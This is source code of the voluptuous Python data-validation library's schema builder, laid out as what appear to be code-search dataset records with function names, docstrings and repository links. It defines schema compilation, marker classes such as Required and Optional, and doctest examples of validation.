... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
"""Iterate over schema in a meaningful order."""
# Without this, Extra might appear first in the iterator, and fail to
# validate a key even though it's a Required that has its own validation,
# generating a false positive.
return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
"""Return iterator over object attributes. Respect objects with
defined __slots__.
"""
d = {}
try:
d = vars(obj)
except TypeError:
# maybe we have named tuple here?
if hasattr(obj, '_asdict'):
d = obj._asdict()
for item in iteritems(d):
yield item
try:
slots = obj.__slots__
except AttributeError:
pass
else:
for key in slots:
if key != '__dict__':
yield (key, getattr(obj, key))
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
"""Indicate that we should work with attributes, not keys."""
def __init__(self, schema, cls=UNDEFINED):
self.cls = cls
super(Object, self).__init__(schema)
class VirtualPathComponent(str):
def __str__(self):
return '<' + self + '>'
def __repr__(self):
return self.__str__()
# Markers.py
class Marker(object):
"""Mark nodes for special treatment."""
def __init__(self, schema_, msg=None, description=None):
self.schema = schema_
self._schema = Schema(schema_)
self.msg = msg
self.description = description
def __call__(self, v):
try:
return self._schema(v)
except er.Invalid as e:
if not self.msg or len(e.path) > 1:
raise
raise er.Invalid(self.msg)
def __str__(self):
return str(self.schema)
def __repr__(self):
return repr(self.schema)
def __lt__(self, other):
if isinstance(other, Marker):
return self.schema < other.schema
return self.schema < other
def __hash__(self):
return hash(self.schema)
def __eq__(self, other):
return self.schema == other
def __ne__(self, other):
return not(self.schema == other)
class Optional(Marker):
"""Mark a node in the schema as optional, and optionally provide a default
>>> schema = Schema({Optional('key'): str})
>>> schema({})
{}
>>> schema = Schema({Optional('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Optional('key', default=list): list})
>>> schema({})
{'key': []}
If 'required' flag is set for an entire schema, optional keys aren't required
>>> schema = Schema({
... Optional('key'): str,
... 'key2': str
... }, required=True)
>>> schema({'key2':'value'})
{'key2': 'value'}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Optional, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Exclusive(Optional):
"""Mark a node in the schema as exclusive.
Exclusive keys inherited from Optional:
>>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
>>> schema({'alpha': 30})
{'alpha': 30}
Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
... schema({'alpha': 30, 'beta': 45})
For example, API can provides multiple types of authentication, but only one works in the same time:
>>> msg = 'Please, use only one type of authentication at the same time.'
>>> schema = Schema({
... Exclusive('classic', 'auth', msg=msg):{
... Required('email'): basestring,
... Required('password'): basestring
... },
... Exclusive('internal', 'auth', msg=msg):{
... Required('secret_key'): basestring
... },
... Exclusive('social', 'auth', msg=msg):{
... Required('social_network'): basestring,
... Required('token'): basestring
... }
... })
>>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
... schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
... 'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
"""
def __init__(self, schema, group_of_exclusion, msg=None, description=None):
super(Exclusive, self).__init__(schema, msg=msg,
description=description)
self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
""" Mark a node in the schema as inclusive.
Inclusive keys inherited from Optional:
>>> schema = Schema({
... Inclusive('filename', 'file'): str,
... Inclusive('mimetype', 'file'): str
... })
>>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
>>> data == schema(data)
True
Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
... schema({'filename': 'dog.jpg'})
If none of the keys in the group are present, it is accepted:
>>> schema({})
{}
For example, API can return 'height' and 'width' together, but not separately.
>>> msg = "Height and width must exist together"
>>> schema = Schema({
... Inclusive('height', 'size', msg=msg): int,
... Inclusive('width', 'size', msg=msg): int
... })
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'height': 100})
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'width': 100})
>>> data = {'height': 100, 'width': 100}
>>> data == schema(data)
True
"""
def __init__(self, schema, group_of_inclusion,
msg=None, description=None, default=UNDEFINED):
super(Inclusive, self).__init__(schema, msg=msg,
default=default,
description=description)
self.group_of_inclusion = group_of_inclusion
class Required(Marker):
"""Mark a node in the schema as being required, and optionally provide a default value.
>>> schema = Schema({Required('key'): str})
>>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
... schema({})
>>> schema = Schema({Required('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Required('key', default=list): list})
>>> schema({})
{'key': []}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Required, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Remove(Marker):
"""Mark a node in the schema to be removed and excluded from the validated
output. Keys that fail validation will not raise ``Invalid``. Instead, these
keys will be treated as extras.
>>> schema = Schema({str: int, Remove(int): str})
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
... schema({'keep': 1, 1: 1.0})
>>> schema({1: 'red', 'red': 1, 2: 'green'})
{'red': 1}
>>> schema = Schema([int, Remove(float), Extra])
>>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
[1, 2, 3, 5, '7']
"""
def __call__(self, v):
super(Remove, self).__call__(v)
return self.__class__
def __repr__(self):
return "Remove(%r)" % (self.schema,)
def __hash__(self):
return object.__hash__(self)
def message(default=None, cls=None):
"""Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid)
"""
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema.infer | python | def infer(cls, data, **kwargs):
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs) | Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L210-L251 | [
"def value_to_schema_type(value):\n if isinstance(value, dict):\n if len(value) == 0:\n return dict\n return {k: value_to_schema_type(v)\n for k, v in iteritems(value)}\n if isinstance(value, list):\n if len(value) == 0:\n return list\n else:\n ... | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_mapping | python | def _compile_mapping(self, schema, invalid_msg=None):
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
